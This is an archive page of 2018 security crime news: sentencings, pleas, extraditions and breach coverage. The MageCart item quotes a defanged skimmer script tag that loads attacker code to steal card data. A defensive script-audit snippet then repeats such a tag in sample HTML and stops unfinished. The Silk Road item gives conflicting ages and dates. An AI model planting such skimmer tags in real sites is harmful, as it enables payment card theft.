- Crime -

Last update 09.10.2017 13:47:49


Ex-Equifax Manager Gets Home Confinement for Insider Trading
19.10.2018 securityweek

A former Equifax manager was sentenced Tuesday to serve eight months home confinement for engaging in insider trading in the wake of the company’s massive data breach last year.

Sudhakar Reddy Bonthu, who worked as a software product development manager for the Atlanta-based credit-reporting agency, had pleaded guilty in July. U.S. District Judge Amy Totenberg also ordered Bonthu to pay a $50,000 fine, to serve 50 hours of community service and to forfeit the proceeds he gained from insider trading.

Born in Andhra Pradesh, India, Bonthu, 44, has lived in the United States since 2000. But he is not a U.S. citizen and faces possible deportation as a result of his felony conviction.

Hackers who haven’t been identified accessed Equifax databases without authorization from mid-May through July in 2017 and obtained customers’ personal information. Federal authorities say Equifax discovered the suspicious activity on its network on July 29, 2017.

The company ultimately revealed that the information of nearly 150 million Americans was exposed.

Bonthu and other Equifax employees were asked on Aug. 25, 2017, to help respond to the breach, but were told the work involved a potential Equifax customer, not Equifax itself, prosecutors have said.

Bonthu knew the target date for announcing the breach was Sept. 6. Bonthu used his wife’s brokerage account on Sept. 1 to buy 86 put options in Equifax stock that expired Sept. 15 for about $1,300, prosecutors said. Put options allow the holder to make a profit if the stock price drops.

After the share value plunged when the breach was publicly disclosed on Sept. 7, 2017, Bonthu exercised his put options and made a profit of about $75,000.

Bonthu also faced civil charges from the Securities and Exchange Commission and settled that case in July.

Another former Equifax employee also faces insider trading charges related to the breach. Jun Ying, former chief information officer of Equifax’s U.S. Information Solutions, was indicted in March. He has pleaded guilty and his case is pending. He also faces civil charges of insider trading from the SEC.

Equifax Chief Financial Officer John Gamble and three other executives sold shares worth a combined $1.8 million days after Equifax discovered suspicious activity on its network, but Equifax said an independent committee determined that these executives did not know of the breach when their trades were made.

Bonthu’s wife, addressing the judge during the sentencing hearing, questioned why her husband was being punished when top executives were not.

“He’s just a small fish in this whole game,” Rekha Vummadi said.

Bonthu also addressed the judge, saying he accepted responsibility for his actions and that he was sorry to Equifax stakeholders and to his family.

Totenberg said she had reviewed Bonthu’s history and read letters submitted by his family and former colleagues. Bonthu is clearly very intelligent and has contributed to his community and worked hard to build a good life for his family in this country, she said.

“I don’t know what got into you on this one occasion,” she said and speculated that Bonthu had suffered from the “infection of capitalism.”

Totenberg noted that perhaps the most serious consequence Bonthu faces — possible deportation — is something over which she has no control. With an eye toward potential immigration proceedings, she said for the record that she doesn’t see any evidence of moral turpitude, which can be grounds for deportation.

Ex-Virginia Teacher Charged in 2014 'Celebgate' Hacking
19.10.2018 securityweek

A former Virginia high school teacher is the fifth person charged in an investigation into the 2014 "celebgate" scandal in which hackers obtained nude photographs and other private information from more than 200 people, including celebrities.

Documents filed in federal court show that Christopher Brannan, 30, a former teacher at Lee-Davis High School, has agreed to plead guilty to charges of aggravated identity theft and unauthorized access to a protected computer.

The case was originally filed in Los Angeles, but was transferred to Virginia, where Brannan lives.

Thom Mrozek, a spokesman for the U.S. Attorney's Office in Los Angeles, confirmed Wednesday that Brannan is charged in the "celebgate" investigation.

Mrozek would not release the names of the celebrities. But at the time, actress Jennifer Lawrence acknowledged that she was a victim of the hack.

Mrozek said prosecutors have linked Brannan to the hacking, but not to the leak of nude photographs in 2014.

Lawrence contacted authorities after naked photos of her began appearing online. Actress Mary Elizabeth Winstead also confirmed that nude photos of her were posted online.

Under a plea agreement, Brannan's lawyer and prosecutors will recommend a prison sentence of nearly three years. A hearing is scheduled Monday in Richmond.

A statement of facts filed with Brannan's plea agreement says that between August 2013 and October 2014, in Los Angeles County, Virginia and elsewhere, Brannan hacked into internet and email accounts, including Apple iCloud, Yahoo! and Facebook. He was then able to obtain iCloud backups, photographs and other private information belonging to the victims.

The statement said Brannan would gain access to accounts by researching the victims' social media accounts to learn the answers to their security questions, which he then used to access their email accounts.

Brannan also admitted using fraudulent email addresses designed to look like Apple Inc. security accounts. The emails would ask the victims to provide their usernames and passwords to their internet accounts.

Because the emails appeared to be from Apple, the victims would provide the information. Brannan would then use it to access the victims' email accounts, where he obtained personal information, such as "sensitive and private photographs and videos."

Court documents do not include the names of the victims. A spokesman for prosecutors said the victims' names will not be released.

Brannan could not immediately be reached for comment. His lawyer, Abraham Del Rio III, did not respond to requests for comment.

Joshua Stueve, a spokesman for U.S. Attorney G. Zachary Terwilliger, said prosecutors will not release the names of the victims to protect their privacy.

Chris Whitley, a spokesman for Hanover County Public Schools, said Brannan worked at Lee-Davis High School in Mechanicsville, just outside Richmond, from August 2013 to June 2015.

Whitley told the Richmond Times-Dispatch that Brannan was immediately put on administrative leave in January 2015 after school officials were notified by the FBI of an investigation. He said school officials were not given details about the nature of the investigation.

Court documents say Brannan has also admitted hacking or trying to hack accounts of current and former teachers and students at the high school.

Silk Road Admin Pleads Guilty
8.10.2018 securityweek

An Irish man pled guilty in a United States court to his role in the administration of Silk Road, a black-market website.

The man, Gary Davis, 30, of Wicklow, Ireland, who went by the online handle of “Libertas,” was a member of the small administrative staff behind the Silk Road website. On Friday, he pled guilty to conspiring to distribute massive quantities of narcotics, a charge arising out of his admin role.

Silk Road, an online marketplace that operated between 2011 and 2013, was used by “thousands of drug dealers and other unlawful vendors to distribute illegal drugs and other illicit goods and services to more than 100,000 buyers,” the Department of Justice said in an announcement.

Owned by Ross William Ulbricht, also known as “Dread Pirate Roberts,” “DPR,” and “Silk Road,” the marketplace was also used to launder hundreds of millions of dollars derived from the unlawful transactions it hosted. Ulbricht was sentenced in 2015.

Silk Road, which was shut down in October 2013, was run by a small support staff that included both site administrators and forum moderators, documents presented in court claim.

The admins would monitor user activity, respond to customer service inquiries, and resolve issues between buyers and vendors. The forum moderators monitored user activity on discussion forums, provided guidance on how to conduct business on Silk Road, and reported significant problems to admins.

The court documents allege that Davis served as a forum moderator for Silk Road between May 2013 and June 2013 and that he then served as a site admin up to October 2, 2013.

His responsibilities included responding to customer support requests, resolving disputes that arose between drug dealers and buyers on the site, and enforcing the rules for doing business on Silk Road, which had been set by Ulbricht. Davis was reportedly paid a weekly salary for his work.

Davis was extradited to the United States four years after his arrest, prosecutors announced in July. On Friday, he pled guilty before United States District Judge Jesse M. Furman to one count of conspiracy to distribute narcotics.

Davis faces a maximum sentence of 20 years in prison. His sentencing has been scheduled for January 17, 2019.

“As he admitted today, Gary Davis served as an administrator who helped run the Silk Road marketplace. Davis’s arrest, extradition from Ireland, and conviction should send a clear message: the purported anonymity of the dark web is not a protective shield from prosecution,” Geoffrey S. Berman, the United States Attorney for the Southern District of New York, said.

Silk Road admin pleaded guilty to drug trafficking charges and faces up to 20 years in prison
7.10.2018 securityaffairs

Gary Davis, one of the admins and moderators of the notorious Silk Road black marketplace, pleaded guilty to drug trafficking charges.
Gary Davis is an Irish national (20) who was one of the admins and moderators of the notorious Silk Road black marketplace; on Friday he pleaded guilty to drug trafficking charges.

“Geoffrey S. Berman, the United States Attorney for the Southern District of New York, announced that GARY DAVIS, a/k/a “Libertas,” pled guilty today to conspiring to distribute massive quantities of narcotics, a charge arising out of his role as a member of the small administrative staff of “Silk Road.”” reads the DoJ press release.

“Manhattan U.S. Attorney Geoffrey S. Berman said: “Silk Road was a secret online marketplace for illegal drugs, hacking services, and a whole host of other criminal activity. As he admitted today, Gary Davis served as an administrator who helped run the Silk Road marketplace. Davis’s arrest, extradition from Ireland, and conviction should send a clear message: the purported anonymity of the dark web is not a protective shield from prosecution.””


The man, who is also known as Libertas, could face a maximum sentence of 20 years in prison. Davis also provided customer support to Silk Road users in 2013, a job for which he received a weekly salary.

“From May 2013 up to June 2013, DAVIS served as a forum moderator for Silk Road. From June 2013 up to October 2, 2013, DAVIS worked as a site administrator on Silk Road. ” continues the press release.

“In his role as a site administrator, DAVIS’s responsibilities included (1) responding to customer support requests from Silk Road users who needed assistance with their buyer or seller accounts on the marketplace; (2) serving as an arbitrator by resolving disputes that arose between drug dealers and buyers on the site; and (3) enforcing the rules for doing business on Silk Road, which had been set by Ulbricht. “

Silk Road was seized by law enforcement in 2013 and its founder Ross William Ulbricht (aka Dread Pirate Roberts) was arrested; he was later sentenced to life in prison after being convicted on multiple counts related to the Silk Road activity.

According to the FBI, between February 2011 and July 2013, Silk Road managed $1.2 billion worth of transactions for 957,079 users, and Ulbricht's total earnings were nearly $80 million.

According to the DoJ press release, more than $200 million worth of illegal drugs and other contraband were sold through the black market.

The FBI also seized about $33.6 million worth of Bitcoin, which was later sold by authorities in a series of auctions.

In November 2013, after the seizure of the original Silk Road, a new version of the popular black market, the so-called Silk Road 2.0, was launched, and Libertas was one of its administrators, but it is not clear whether the pseudonym was still used by Davis at the time.

Davis was identified and arrested in Ireland in January 2014. He opposed extradition to the U.S., citing his mental health and fear for his life, and argued that extradition and subsequent incarceration in the U.S. would violate his fundamental rights.

Davis was extradited to the United States in July 2014; he is expected to be sentenced on 17 January 2019 by Judge Furman.
“DAVIS, 30, of Wicklow, Ireland, pled guilty to one count of conspiracy to distribute narcotics, which carries a maximum sentence of 20 years in prison.” concludes the DoJ. “The maximum potential sentence in this case is prescribed by Congress and is provided here for informational purposes only, as any sentencing of the defendant will be determined by the judge. DAVIS is scheduled to be sentenced by Judge Furman on January 17, 2019 at 3:30 p.m.”

eCommerce Fraud Prevention Firm Forter Raises $50 Million
27.9.2018 securityweek

Forter, a company that specializes in preventing e-commerce fraud, on Wednesday announced that it raised $50 million in a series D funding round.

The round was led by March Capital Partners, with participation from Salesforce Ventures and previous investors Sequoia Capital, Scale Venture Partners and New Enterprise Associates. The money will be used to fuel the expansion of the company's fraud prevention platform.

The latest funding round brings the total raised by Forter since its launch in 2013 to $100 million.

Forter provides an AI-powered platform designed to identify fraud in real time. The company says its solution can differentiate legitimate customers from fraudsters based on a database of 175 million identities and a combination of 6,000 event and decision data points, including site visits, orders, account sign-ups, transaction data, account activity, buying patterns, and change of information.

Forter says its platform is capable of identifying attempts to hijack legitimate accounts, and attempts to abuse accounts, loyalty programs, and referrals and promos. It can also detect when fraudsters attempt to return goods for a full refund after using them.

A study conducted recently by the company showed that account takeover attempts increased by 53% in the last year.

Forter, which recently opened its first office in Europe, says it processes transactions totaling over $50 billion every year and its platform covers more than 180 million consumers in the United States.

Forter claims its customer base has tripled in the past year and that it includes Fortune 500 retailers and other companies in the U.S., Europe and Asia.

“We’ve been seeing a major trend of offline commerce shifting online and the Forter team has built a solution to detect and prevent fraud across the payments ecosystem with the advantage of next-generation technology that leverages machine learning,” said Jamie Montgomery, Managing Director at March Capital Partners. “We’re excited to be involved with a company on the forefront of their industry and to watch Forter evolve as the fraud landscape grows more complex.”

Darktrace Raises $50 Million at $1.65 Billion Valuation
27.9.2018 securityweek

UK-based Darktrace announced late on Wednesday that it has raised $50 million in a Series E funding round that values the company at $1.65 billion.

The latest financing round, which will help Darktrace drive further international expansion and development, was led by Vitruvian Partners with participation from existing investors KKR and 1011 Ventures.

The company has raised a total of nearly $230 million, including $18 million in March 2015, $22.5 million in July 2015, $65 Million in July 2016 and $75 million in July 2017.


Darktrace technology leverages machine learning and AI algorithms to detect cyber threats in cloud, virtual, IoT and industrial environments. The company claims its solutions have self-learning capabilities, allowing them to quickly detect threats, including zero-days and malicious insiders.

The company has more than 30 offices worldwide and 750 employees – the number of employees has increased by 60% in the past year. Bloomberg reported earlier this month that the company expects to have roughly 1,000 employees by the end of the year.

Interestingly, Bloomberg cited Darktrace CEO Nicole Eagan saying that the company had not been pursuing fresh capital.

Darktrace says its technology currently protects over 7,000 networks – including at major airports and global financial institutions – and claims that adoption of its Antigena autonomous response solution has increased by 30% in the last quarter.

“Darktrace has built a unique combination of world-class AI capabilities, deep cyber domain expertise, and a highly effective business model,” said Sophie Bower-Straziota, Managing Director at Vitruvian. “This has rapidly created scale and a leading edge over all competitors. Most excitingly, the sophistication and quality of Darktrace’s AI is evidenced by the rapid success of its autonomous response system, Antigena, the first of its kind in the market. We are delighted to be leading this financing round, as Darktrace represents exactly the type of highly innovative company Vitruvian seeks to invest behind and support.”

Operator of Counter AV Service Sentenced to 14 Years in Prison
24.9.2018 securityweek

A 38-year-old Latvian resident was sentenced last week in the United States to 168 months in prison for his role in operating a counter antivirus service called Scan4You.

Ruslans Bondars, a citizen of the former USSR, had been residing in Latvia when he was arrested in May 2017 along with Russian national Jurijs Martisevs. The men were accused of running Scan4You, a service designed to help cybercriminals test their malware to ensure that security products would not detect it.

A U.S. jury convicted Bondars in May on one count of conspiracy to violate the Computer Fraud and Abuse Act (CFAA), one count of conspiracy to commit wire fraud, and one count of computer intrusion with intent to cause damage and aiding and abetting.

He has now been sentenced to 14 years in prison, followed by three years of supervised release. The court is also expected to make a decision regarding forfeiture and paying restitution to victims.

This is one of the longest prison sentences handed down by a U.S. court for cybercrimes. The longest ever prison sentence was handed down to Roman Valeryevich Seleznev, the son of a Russian lawmaker. He was initially sentenced to 27 years in prison and later received two other 14-year sentences.

Scan4You was active between 2009 and 2016, and it has been described as one of the largest counter AV services. Scan4You allowed cybercriminals to conduct 100,000 scans per month for $30. The service was also popular among counter antivirus resellers such as Indetectables, RazorScanner and reFUD.me.

Authorities said the service was used by thousands of users to test malware, including threats that infected tens of millions of devices and ones that helped cybercriminals carry out major operations aimed at U.S. businesses. The court established that the losses associated with Scan4You total over $20 billion.

It was not difficult for investigators to identify Bondars. He used the same Gmail account to register command and control (C&C) domains for malware and to create a Facebook account. That Gmail account also contained his real name and profile photo.

Martisevs pleaded guilty in March to conspiracy and aiding and abetting computer intrusions. His sentencing was scheduled for July, but the Justice Department has not provided any updates on the case.

Investigators believe an individual from Great Falls, Virginia, who has not been named, was also involved in running Scan4You.

Operator of Scan4You Malware-Scanning sentenced to 14 Years in prison
23.9.2018 securityaffairs

The Latvian expert Ruslans Bondars (37), who developed and ran the counter antivirus service Scan4You, has been sentenced to 14 years in prison.
Bondars was convicted of conspiracy to violate the Computer Fraud and Abuse Act, conspiracy to commit wire fraud, and computer intrusion with intent to cause damage.

“A Latvian “non-citizen,” meaning a citizen of the former USSR who resided in Riga, Latvia, was sentenced to 168 months in prison today for offenses related to his operation of “Scan4you,” an online counter antivirus service that helped computer hackers determine whether the computer viruses and other malicious software they created would be detected by antivirus software, announced Assistant Attorney General Brian A. ” reads the press release published by DoJ.

Scan4you was a VirusTotal-like online multi-engine antivirus scanning service that could be used by malware writers (vxers) to test the evasion capabilities of their malware against the major antivirus products.

Unlike VirusTotal, Scan4you offered a totally anonymous service to its users, meaning that data related to the scans of uploaded files was not shared with the antivirus firms.

Bondars is one of the two hackers found to have been running Scan4you from 2009 to 2016; the service was very popular in the cybercrime community and was used by malware developers to test their malicious code.

Ruslans Bondars pleaded guilty on May 16 in federal court in Alexandria; according to a co-conspirator, the man had also helped Russian law enforcement.

The other hacker who operated the Scan4you service, Jurijs Martisevs, was arrested while on a trip to Latvia and extradited to the United States. He pleaded guilty to the same charges as Bondars in March 2018.

The Scan4you service allowed its customers to develop malicious code that was used to steal millions of payment cards from retail stores across the world; overall losses have been estimated at $20.5 billion.

“In issuing the sentence, the court found a loss amount of $20.5 billion. In addition to the term of imprisonment, U.S. District Judge Liam O’Grady ordered Bondars to serve three years of supervised release. A decision regarding forfeiture and payment of restitution to victims of the offenses is forthcoming.” continues the press release.

“A Scan4you customer, for example, used the service to test malware that was subsequently used to steal approximately 40 million credit and debit card numbers, as well as approximately 70 million addresses, phone numbers and other pieces of personal identifying information, from retail store locations throughout the United States, causing one retailer approximately $292 million in expenses resulting from the intrusion.”

The DoJ cited the case of a Scan4you customer that used the service to test malware which was then used to steal approximately 40 million credit and debit card numbers, and other personal information, from a US retail store, causing $292 million in losses.

A second customer used Scan4you to contribute to the development of the infamous Citadel malware, which caused over $500 million in fraud-related losses.
“Ruslans Bondars helped malware developers attack American businesses,” explained Assistant Attorney General Benczkowski.

“The Department of Justice and its law enforcement partners make no distinction between service providers like Scan4You and the hackers they assist: we will hold them accountable for all of the significant harm they cause and work tirelessly to bring them to justice, wherever they may be located.”

China Arrests Suspect for Customer Data Leak at Accor Partner
22.9.2018 securityweek

Shanghai police have arrested a man in connection with a data leak at NASDAQ-listed Chinese hotelier Huazhu Group after the suspect failed to sell the information online.

The 30-year-old suspect had hacked and stolen user data from hotels under Huazhu Group and tried to sell it on overseas websites, the police said in a statement late Wednesday.

Huazhu, one of China's biggest hoteliers and the local partner of France-based AccorHotels, had alerted police to reports in August that the company's internal data was being sold online.

Huazhu Group said in a statement to the New York stock exchange on Monday that "the suspect also attempted to blackmail Huazhu by leveraging public pressure, without success".

The potentially leaked data included guest membership information, personal IDs, check-in records, guest names, mobile numbers and emails.

Shanghai police said the case is under further investigation.

Huazhu operates more than 3,000 hotels in more than 370 cities in China, including the AccorHotels brands Ibis and Mercure.

The sale of personal information is common in China, which last year implemented a controversial cybersecurity law that requires services to store user data in China and receive approval from users before sharing their details.

Before Huazhu formed a long-term alliance with Accor in 2014 to help the French hotel group develop the Chinese market, it experienced another user data leak.

Xinhua reported check-in records from Huazhu and other hoteliers were stored by third parties and leaked in late 2013 due to management system loopholes.

Chinese e-commerce giant Alibaba came under fire earlier this year over its handling of user data in an episode that underscores growing concerns for privacy in the hyper-digitised country.

Greek authorities approved extradition of Russian hacker Alexander Vinnik to Russia
18.9.2018 securityaffairs

Greek authorities have approved the extradition of Russian Alexander Vinnik to Russia; the Supreme Civil and Criminal Court of Greece overruled previous rulings.
The Greek authorities have approved the extradition of Russian Alexander Vinnik to Russia. The decision has surprised the media because the man was expected to be extradited to the US or France, as previously announced.

The decision of the Supreme Civil and Criminal Court of Greece has overruled previous ones that were taken by other Greek courts.

Vinnik was wanted by Russia, France, and the United States, where he is charged with different hacking crimes.

Greek police arrested the Russian national Alexander Vinnik (38) and accused him of running the BTC-e Bitcoin exchange to launder more than US$4bn worth of the cryptocurrency.

The police seized two laptops, two tablets, mobile phones, a router, a camera, and four credit cards.

The authorities reported that since 2011, 7 million Bitcoin went into the BTC-e exchange and 5.5 million were withdrawn.

According to the Greek media outlet the Daily Thess, the FBI tracked Alexander Vinnik for more than a year.

The man is charged by the US authorities with fraud and money laundering involving more than $4 billion worth of Bitcoin (BTC) resulting from criminal activities; US prosecutors requested his extradition in July 2017.

The Greek Supreme Court initially opted to extradite Vinnik to the US to face charges of operating an unlicensed money service business, money laundering, conspiracy to commit money laundering, and engaging in unlawful monetary transactions.

Vinnik is also accused of being responsible for the failure of the Japanese bitcoin exchange Mt. Gox.
Mt. Gox was the biggest Bitcoin exchange at the time of its shutdown in 2014, which followed a series of cyber heists totaling $375 million in Bitcoin.

The U.S. authorities speculate that the Russian man stole funds from Mt. Gox with the help of an insider. The stolen funds were transferred to a wallet managed by Vinnik and laundered through his BTC-e platform over a three-year period.

In July 2018 there was a twist: a Greek lower court agreed to extradite Vinnik to France to face charges of hacking, money laundering, extortion and involvement in organized crime.

The Russian Foreign Ministry criticized the ruling and said the country would respond.

“Several days after taking an unfriendly decision to expel Russian diplomats and to deny entry to several Russian citizens, they have adopted a decision to extradite Russian citizen Alexander Vinnik to France,” Russia’s Foreign Ministry wrote in a statement. “It is obvious that Russia cannot leave these actions unanswered.”


The Russian government officially asked the Greek government to extradite Vinnik to Russia, where he is facing around $10,000 worth of fraud charges, practically nothing compared to the charges in the US and France.

Now, the decision of the Greek Supreme Court is disconcerting: Vinnik is going to be extradited to Russia.

The Supreme Court will analyze France’s request for extradition on September 19, but its decision could be overruled by the Greek Minister of Justice.

Nigerian Fraudster Who Stole Millions Heads to U.S. Prison
15.9.2018 securityweek Crime

A Nigerian man was sentenced in Manhattan federal court to 60 months in prison for his role in fraudulent business email compromise (BEC) scams, the United States Department of Justice announced this week.

The man, Onyekachi Emmanuel Opara, 30, of Lagos, Nigeria, was charged with defrauding thousands of victims of more than $25 million. He pleaded guilty to conspiracy to commit wire fraud and wire fraud in April.

In addition to the prison term, Opara was sentenced to two years of supervised release and was ordered to pay $2.5 million in restitution. His co-defendant, David Chukwuneke Adindu (“Adindu”), was sentenced in December 2017 to 41 months in prison and ordered to pay $1.4 million in restitution.

Between 2014 and 2016, Opara and Adindu engaged in multiple BEC scams that targeted victims worldwide, including the United States, the United Kingdom, Australia, Switzerland, Sweden, New Zealand, and Singapore.

As part of the scheme, Opara sent fake emails to employees of the victim companies, asking for funds to be transferred to specified bank accounts. The emails appeared to come from supervisors at those companies or from third-party vendors the companies did business with.

“In reality, the emails were either sent from email accounts with domain names very similar to those of the companies and vendors, or the metadata for the emails was modified to make it appear as if the emails had been sent from legitimate email addresses,” the DoJ explains.

The fraudsters withdrew the funds immediately after the victims transferred them, or moved them to other bank accounts controlled by scheme participants. The fraudsters attempted to steal more than $25 million from their intended victims.

Opara also created accounts on dating websites and engaged in online romantic relationships with individuals in the United States by posing as a young attractive woman. Using this fake identity, he instructed individuals in the U.S. to send money overseas and/or to receive money fraudulently acquired through the BEC scams, and forward the proceeds to others.

One of the individuals who fell for this romance scheme sent over $600,000 of their own money to bank accounts controlled by scheme participants.

“Opara also attempted to recruit at least 14 other individuals via dating websites to receive funds from BEC scams into their bank accounts and then transfer the proceeds to overseas bank accounts,” the DoJ reveals.

The fraudster was arrested in December 2016, in Johannesburg, South Africa, and was extradited to the U.S. in January 2018.

Kelihos botmaster pleads guilty in U.S. District Court in Connecticut
14.9.2018 securityaffairs BotNet  Crime

The creator of the infamous Kelihos Botnet, Peter Yuryevich Levashov (38) pleaded guilty this week to computer crime, fraud, conspiracy and identity theft charges.
Levashov, 38, the botmaster of the Kelihos botnet, entered the plea in a U.S. federal court.

In April 2017, the United States Department of Justice announced that Peter Yuryevich Levashov (36) (also known as Petr Levashov, Peter Severa, Petr Severa and Sergey Astakhov) was arrested in Barcelona for his involvement with the infamous Kelihos botnet. Levashov was extradited to the United States in February.

“Peter Yuryevich Levashov, aka “Petr Levashov,” “Peter Severa,” “Petr Severa” and “Sergey Astakhov,” 38, of St. Petersburg, Russia, pleaded guilty today in U.S. District Court in Hartford, Connecticut, to offenses stemming from his operation of the Kelihos botnet, which he used to facilitate malicious activities including harvesting login credentials, distributing bulk spam e-mails, and installing ransomware and other malicious software.” states the press release published by the DoJ.

Levashov on Wednesday pleaded guilty in U.S. District Court in Hartford, Connecticut, to one count of causing intentional damage to a protected computer, one count of conspiracy, one count of aggravated identity theft, and one count of wire fraud.


According to a study conducted by Check Point, the malware landscape showed some interesting changes in the first part of 2017.

The Kelihos botnet climbed to the top position, while the Conficker worm dropped to fourth on the chart of malware.

Levashov has operated several botnets since the late 1990s; two earlier botnets, tracked as Storm and Waledac, share code with Kelihos, and both have been attributed to him.

“For over two decades, Peter Levashov operated botnets which enabled him to harvest personal information from infected computers, disseminate spam, and distribute malware used to facilitate multiple scams,” said Assistant Attorney General Benczkowski.

“Mr. Levashov used the Kelihos botnet to distribute thousands of spam e-mails, harvest login credentials, and install malicious software on computers around the world,” said U.S. Attorney Durham. “He also participated in online forums on which stolen identities, credit card information and cybercrime tools were traded and sold. For years, Mr. Levashov lived quite comfortably while his criminal behavior disrupted the lives of thousands of computer users.”

The DoJ believes Levashov also sent spam urging recipients to buy shares as part of a “pump and dump” scam, among other schemes.

The Russian hacker was accused of having used the Kelihos botnet for spam campaigns that advertised various criminal schemes, including pump-and-dump stock fraud.

The activity conducted by the Kelihos, Storm and Waledac botnets was very profitable; prosecutors believe it allowed the crooks to earn hundreds of millions of dollars.

“For years, Mr. Levashov lived quite comfortably while his criminal behavior disrupted the lives of thousands of computer users,” said U.S. Attorney John H. Durham of the District of Connecticut. “Thanks to the collaborative work of the FBI and our partners in law enforcement, private industry and academia, a prolific cybercriminal has been neutralized, and has now admitted his guilt in a U.S. courtroom.”

Sentencing has been scheduled for September 6, 2019, likely because Levashov is now assisting law enforcement agencies with investigations into other cybercrime operations.

Romanian Court Rules Hacker Can be Extradited to US
12.9.2018 securityweek Crime

A Romanian court has ruled that a hacker known as Guccifer should be extradited to the U.S. to serve a 4½-year prison sentence.

The court in the central city of Alba Iulia ruled Monday that Romanian Marcel Lazar Lehel will be extradited after completing a seven-year sentence in Romania.

Guccifer gained global notoriety after he hacked the email accounts of U.S. officials including former Secretary of State Colin Powell and members of the Bush family.

He also claimed to have hacked the emails of Secretary of State Hillary Clinton, but prosecutors found no evidence of that. However, he was found to have hacked an email account of Sidney Blumenthal, a confidant of Clinton, in March 2013. The subsequent leak of Blumenthal's emails was the first time that outsiders became aware of Clinton's private "clintonemail.com" address, which she used to communicate with Blumenthal. It became part of the investigation into whether Clinton mishandled sensitive emails.

Lehel, 46, was sent to the U.S. in March 2016 and pleaded guilty to accessing the personal emails and social media accounts of some 100 U.S. citizens between 2012 and 2014 and releasing their private photographs and correspondence.

Among the Americans he hacked was "Sex and the City" author Candace Bushnell.

He was later sent back to Romania and is currently incarcerated in the city of Deva after he was sentenced for illegally accessing the email accounts of Romanian officials and public figures.

Monday's ruling can be appealed. Lehel previously said he wants to serve his U.S. prison sentence in Romania.

MageCart crime gang is behind the British Airways data breach
11.9.2018 securityaffairs Crime

An investigation conducted by researchers at RiskIQ revealed that the party responsible for the British Airways data breach is a crime gang tracked as MageCart.
The party responsible for the recently disclosed British Airways data breach is a crime gang tracked as MageCart. The group has been active since at least 2015 and has compromised many e-commerce websites to steal payment card and other sensitive data.

The group injects a skimmer script into target websites to siphon payment card data: once the attackers have compromised a site, they add an embedded piece of JavaScript to the HTML template. Below is an example script, dubbed MagentoCore.

<script type="text/javascript" src="hxxps://magentocore.net/mage/mage.js"></script>
This script records keystrokes from customers and sends them to a server controlled by the attacker.

Typically the hackers attempt to compromise third-party components shared by many sites, which gives them access to a large number of websites at once.

According to RiskIQ, the MageCart group carried out a targeted attack against British Airways and used a customized version of the script to stay under the radar.

The hackers used a dedicated infrastructure for this specific attack against the airline.

“This attack is a simple but highly targeted approach compared to what we’ve seen in the past with the Magecart skimmer which grabbed forms indiscriminately. This particular skimmer is very much attuned to how British Airway’s payment page is set up, which tells us that the attackers carefully considered how to target this site instead of blindly injecting the regular Magecart skimmer.” reads the analysis published by RiskIQ.

“The infrastructure used in this attack was set up only with British Airways in mind and purposely targeted scripts that would blend in with normal payment processing to avoid detection. We saw proof of this on the domain name baways.com as well as the drop server path.”

Experts analyzed all the scripts loaded by the website and searched for any evidence of recent changes.

The experts noticed changes in the Modernizr JavaScript library: the attackers had appended some lines of code at the bottom of the file so as not to break the library itself. The library was modified on August 21 at 20:49 GMT.

The malicious script was loaded from the baggage claim information page on the British Airways website; the code added by the attackers caused Modernizr to send the customer's payment information to the attacker's server.


The script allowed the attackers to steal users' data from both the website and the mobile app.

The data stolen from British Airways was sent as JSON to a server hosted on baways.com, a domain that resembles the legitimate one used by the airline.

The attackers purchased an SSL certificate from Comodo to avoid raising suspicion.

“The domain was hosted on which is located in Romania and is, in fact, part of a VPS provider named Time4VPS based in Lithuania. The actors also loaded the server with an SSL certificate. Interestingly, they decided to go with a paid certificate from Comodo instead of a free LetsEncrypt certificate, likely to make it appear like a legitimate server:” continues RiskIQ.

At the time of writing it is still unclear how MageCart managed to inject the malicious code into the British Airways website.

“As we’ve seen in this attack, Magecart set up custom, targeted infrastructure to blend in with the British Airways website specifically and avoid detection for as long as possible. While we can never know how much reach the attackers had on the British Airways servers, the fact that they were able to modify a resource for the site tells us the access was substantial, and the fact they likely had access long before the attack even started is a stark reminder about the vulnerability of web-facing assets.” concludes RiskIQ.
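RiskIQ found the compromise by enumerating every script the page loaded and looking for recent changes. As an added example (not RiskIQ's or British Airways' code), the following Python performs the two checks a site owner can automate for the same purpose: it lists every `<script src>` on a page and flags hosts outside a hypothetical allowlist (catching an injected tag like the MagentoCore one above) as well as external scripts lacking a subresource-integrity attribute, and it compares the hash of a deployed library against a recorded baseline so that a few lines appended to Modernizr would show up as a changed digest. The allowlist, the HTML, the library contents and the `baways.example` host are all constructed for the example.

```python
"""Audit a page's script tags and local JS bundles for web-skimmer indicators."""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical allowlist of hosts permitted to serve script to the checkout page.
ALLOWED_SCRIPT_HOSTS = {"shop.example.com", "cdn.example.com"}


class ScriptCollector(HTMLParser):
    """Collect (src, has_integrity) for every <script src=...> in the document."""

    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.scripts.append((a["src"], "integrity" in a))


def audit_script_tags(html: str, page_host: str, allowed=ALLOWED_SCRIPT_HOSTS) -> list:
    """Return findings: scripts from unlisted hosts, and external scripts without SRI."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src, has_sri in parser.scripts:
        # Relative URLs resolve to the page's own host.
        host = (urlparse(src).hostname or page_host).lower()
        if host not in allowed:
            findings.append(f"script from unlisted host {host!r}: {src}")
        elif host != page_host and not has_sri:
            findings.append(f"external script without integrity attribute: {src}")
    return findings


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def check_bundle_integrity(name: str, content: bytes, baseline: dict):
    """Compare a deployed library to its recorded baseline hash; return a finding or None."""
    digest = sha256_hex(content)
    expected = baseline.get(name)
    if expected is None:
        return f"{name}: no baseline recorded"
    if digest != expected:
        return f"{name}: content hash changed (expected {expected[:12]}..., got {digest[:12]}...)"
    return None


# Constructed sample: a checkout template into which an extra tag was injected.
SAMPLE_HTML = """<html><head>
<script src="/js/modernizr.js"></script>
<script src="https://cdn.example.com/jquery.js" integrity="sha384-AAAA"></script>
<script type="text/javascript" src="https://baways.example/mage.js"></script>
</head><body></body></html>"""

# Constructed sample: the pristine library and a copy with lines appended at the bottom.
PRISTINE_MODERNIZR = b"/* modernizr 2.x */ window.Modernizr = {};\n"
TAMPERED_MODERNIZR = PRISTINE_MODERNIZR + b"/* appended lines */\n"
# The baseline is recorded from a known-good deployment, before the page is served.
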